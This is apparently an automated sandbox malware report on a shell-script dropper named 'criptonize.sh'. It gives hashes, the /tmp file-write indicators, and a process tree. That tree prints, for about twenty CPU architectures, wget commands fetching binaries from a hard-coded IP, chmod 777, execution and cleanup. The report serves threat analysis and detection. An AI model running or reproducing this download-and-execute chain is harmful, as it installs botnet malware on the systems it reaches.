Resubmissions
27-08-2024 23:50
240827-3vw9rsxdrg 827-08-2024 23:49
240827-3t1wkaxdpd 827-08-2024 23:47
240827-3svyxsxdlf 827-08-2024 23:45
240827-3rvlrsxdjc 3Analysis
-
max time kernel
31s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
27-08-2024 23:45
Static task
static1
Behavioral task
behavioral1
Sample
criptonize.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
criptonize.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
criptonize.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
criptonize.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
criptonize.sh
-
Size
9KB
-
MD5
fe5b1cae588f9ad418e162262b65b865
-
SHA1
c0ab765270f811bcdbb0ad9f4ed2871edcf58caf
-
SHA256
5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
-
SHA512
b9c079cbb03cc31ba0163dbfe3d9a8fda594010717f48d29880496e31b3852fb90423e6291b1697e09c52d72f6bd1f4405021aa63d652a0c96853fff25055774
-
SSDEEP
96:rK7IcSgf29gv+1XVYmm6Wdw9Iu8f/s2CIjTgSWuI:cERlnySeZy
Malware Config
Signatures
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/criptonize.x86_64 wget File opened for modification /tmp/criptonize.i686 wget File opened for modification /tmp/criptonize.i486 wget File opened for modification /tmp/criptonize.armv4eb wget File opened for modification /tmp/criptonize.arc700 wget File opened for modification /tmp/criptonize.aarch64 wget File opened for modification /tmp/criptonize.armv7l wget File opened for modification /tmp/criptonize.powerpc wget File opened for modification /tmp/criptonize.armv4l wget File opened for modification /tmp/criptonize.mips64 wget File opened for modification /tmp/criptonize.mipsel wget File opened for modification /tmp/criptonize.bsdamd64 wget File opened for modification /tmp/criptonize.m68k wget File opened for modification /tmp/criptonize.sh4 wget File opened for modification /tmp/criptonize.sparc wget File opened for modification /tmp/criptonize.i586 wget File opened for modification /tmp/criptonize.armv6l wget File opened for modification /tmp/criptonize.armv5l wget File opened for modification /tmp/criptonize.armv4tl wget File opened for modification /tmp/criptonize.mips wget
Processes
-
/tmp/criptonize.sh/tmp/criptonize.sh1⤵PID:1478
-
/bin/rmrm -f criptonize.x86_642⤵PID:1479
-
-
/usr/bin/wgetwget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_642⤵
- Writes file to tmp directory
PID:1480
-
-
/bin/chmodchmod 777 criptonize.x86_642⤵PID:1493
-
-
/tmp/criptonize.x86_64./criptonize.x86_64 x86_642⤵PID:1494
-
-
/bin/rmrm -f criptonize.x86_642⤵PID:1495
-
-
/bin/rmrm -f criptonize.i6862⤵PID:1496
-
-
/usr/bin/wgetwget -O criptonize.i686 http://212.60.5.174/criptonize.i6862⤵
- Writes file to tmp directory
PID:1497
-
-
/bin/chmodchmod 777 criptonize.i6862⤵PID:1498
-
-
/tmp/criptonize.i686./criptonize.i686 i6862⤵PID:1499
-
-
/bin/rmrm -f criptonize.i6862⤵PID:1500
-
-
/bin/rmrm -f criptonize.i5862⤵PID:1501
-
-
/usr/bin/wgetwget -O criptonize.i586 http://212.60.5.174/criptonize.i5862⤵
- Writes file to tmp directory
PID:1502
-
-
/bin/chmodchmod 777 criptonize.i5862⤵PID:1503
-
-
/tmp/criptonize.i586./criptonize.i586 i5862⤵PID:1504
-
-
/bin/rmrm -f criptonize.i5862⤵PID:1505
-
-
/bin/rmrm -f criptonize.i4862⤵PID:1506
-
-
/usr/bin/wgetwget -O criptonize.i486 http://212.60.5.174/criptonize.i4862⤵
- Writes file to tmp directory
PID:1507
-
-
/bin/chmodchmod 777 criptonize.i4862⤵PID:1508
-
-
/tmp/criptonize.i486./criptonize.i486 i4862⤵PID:1509
-
-
/bin/rmrm -f criptonize.i4862⤵PID:1510
-
-
/bin/rmrm -f criptonize.aarch642⤵PID:1511
-
-
/usr/bin/wgetwget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch642⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/chmodchmod 777 criptonize.aarch642⤵PID:1513
-
-
/tmp/criptonize.aarch64./criptonize.aarch64 aarch642⤵PID:1514
-
-
/bin/rmrm -f criptonize.aarch642⤵PID:1516
-
-
/bin/rmrm -f criptonize.armv7l2⤵PID:1517
-
-
/usr/bin/wgetwget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/chmodchmod 777 criptonize.armv7l2⤵PID:1519
-
-
/tmp/criptonize.armv7l./criptonize.armv7l armv7l2⤵PID:1520
-
-
/bin/rmrm -f criptonize.armv7l2⤵PID:1522
-
-
/bin/rmrm -f criptonize.armv6l2⤵PID:1523
-
-
/usr/bin/wgetwget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/chmodchmod 777 criptonize.armv6l2⤵PID:1525
-
-
/tmp/criptonize.armv6l./criptonize.armv6l armv6l2⤵PID:1526
-
-
/bin/rmrm -f criptonize.armv6l2⤵PID:1528
-
-
/bin/rmrm -f criptonize.armv5l2⤵PID:1529
-
-
/usr/bin/wgetwget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/chmodchmod 777 criptonize.armv5l2⤵PID:1531
-
-
/tmp/criptonize.armv5l./criptonize.armv5l armv5l2⤵PID:1532
-
-
/bin/rmrm -f criptonize.armv5l2⤵PID:1534
-
-
/bin/rmrm -f criptonize.armv4eb2⤵PID:1535
-
-
/usr/bin/wgetwget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/chmodchmod 777 criptonize.armv4eb2⤵PID:1537
-
-
/tmp/criptonize.armv4eb./criptonize.armv4eb armv4eb2⤵PID:1538
-
-
/bin/rmrm -f criptonize.armv4eb2⤵PID:1540
-
-
/bin/rmrm -f criptonize.armv4tl2⤵PID:1541
-
-
/usr/bin/wgetwget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/chmodchmod 777 criptonize.armv4tl2⤵PID:1543
-
-
/tmp/criptonize.armv4tl./criptonize.armv4tl armv4tl2⤵PID:1544
-
-
/bin/rmrm -f criptonize.armv4tl2⤵PID:1546
-
-
/bin/rmrm -f criptonize.armv4l2⤵PID:1547
-
-
/usr/bin/wgetwget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/chmodchmod 777 criptonize.armv4l2⤵PID:1549
-
-
/tmp/criptonize.armv4l./criptonize.armv4l armv4l2⤵PID:1550
-
-
/bin/rmrm -f criptonize.armv4l2⤵PID:1552
-
-
/bin/rmrm -f criptonize.mips642⤵PID:1553
-
-
/usr/bin/wgetwget -O criptonize.mips64 http://212.60.5.174/criptonize.mips642⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/chmodchmod 777 criptonize.mips642⤵PID:1555
-
-
/tmp/criptonize.mips64./criptonize.mips64 mips642⤵PID:1556
-
-
/bin/rmrm -f criptonize.mips642⤵PID:1558
-
-
/bin/rmrm -f criptonize.mips2⤵PID:1559
-
-
/usr/bin/wgetwget -O criptonize.mips http://212.60.5.174/criptonize.mips2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/chmodchmod 777 criptonize.mips2⤵PID:1561
-
-
/tmp/criptonize.mips./criptonize.mips mips2⤵PID:1562
-
-
/bin/rmrm -f criptonize.mips2⤵PID:1564
-
-
/bin/rmrm -f criptonize.mipsel2⤵PID:1565
-
-
/usr/bin/wgetwget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/chmodchmod 777 criptonize.mipsel2⤵PID:1567
-
-
/tmp/criptonize.mipsel./criptonize.mipsel mipsel2⤵PID:1568
-
-
/bin/rmrm -f criptonize.mipsel2⤵PID:1570
-
-
/bin/rmrm -f criptonize.powerpc2⤵PID:1571
-
-
/usr/bin/wgetwget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/chmodchmod 777 criptonize.powerpc2⤵PID:1573
-
-
/tmp/criptonize.powerpc./criptonize.powerpc powerpc2⤵PID:1574
-
-
/bin/rmrm -f criptonize.powerpc2⤵PID:1576
-
-
/bin/rmrm -f criptonize.m68k2⤵PID:1577
-
-
/usr/bin/wgetwget -O criptonize.m68k http://212.60.5.174/criptonize.m68k2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/chmodchmod 777 criptonize.m68k2⤵PID:1579
-
-
/tmp/criptonize.m68k./criptonize.m68k m68k2⤵PID:1580
-
-
/bin/rmrm -f criptonize.m68k2⤵PID:1582
-
-
/bin/rmrm -f criptonize.sh42⤵PID:1583
-
-
/usr/bin/wgetwget -O criptonize.sh4 http://212.60.5.174/criptonize.sh42⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/chmodchmod 777 criptonize.sh42⤵PID:1585
-
-
/tmp/criptonize.sh4./criptonize.sh4 sh42⤵PID:1586
-
-
/bin/rmrm -f criptonize.sh42⤵PID:1588
-
-
/bin/rmrm -f criptonize.sparc2⤵PID:1589
-
-
/usr/bin/wgetwget -O criptonize.sparc http://212.60.5.174/criptonize.sparc2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/chmodchmod 777 criptonize.sparc2⤵PID:1591
-
-
/tmp/criptonize.sparc./criptonize.sparc sparc2⤵PID:1592
-
-
/bin/rmrm -f criptonize.sparc2⤵PID:1594
-
-
/bin/rmrm -f criptonize.arc7002⤵PID:1595
-
-
/usr/bin/wgetwget -O criptonize.arc700 http://212.60.5.174/criptonize.arc7002⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/chmodchmod 777 criptonize.arc7002⤵PID:1597
-
-
/tmp/criptonize.arc700./criptonize.arc700 arc7002⤵PID:1598
-
-
/bin/rmrm -f criptonize.arc7002⤵PID:1600
-
-
/bin/rmrm -f criptonize.bsdamd642⤵PID:1601
-
-
/usr/bin/wgetwget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd642⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/chmodchmod 777 criptonize.bsdamd642⤵PID:1605
-
-
/tmp/criptonize.bsdamd64./criptonize.bsdamd64 bsdamd642⤵PID:1606
-
-
/bin/rmrm -f criptonize.bsdamd642⤵PID:1608
-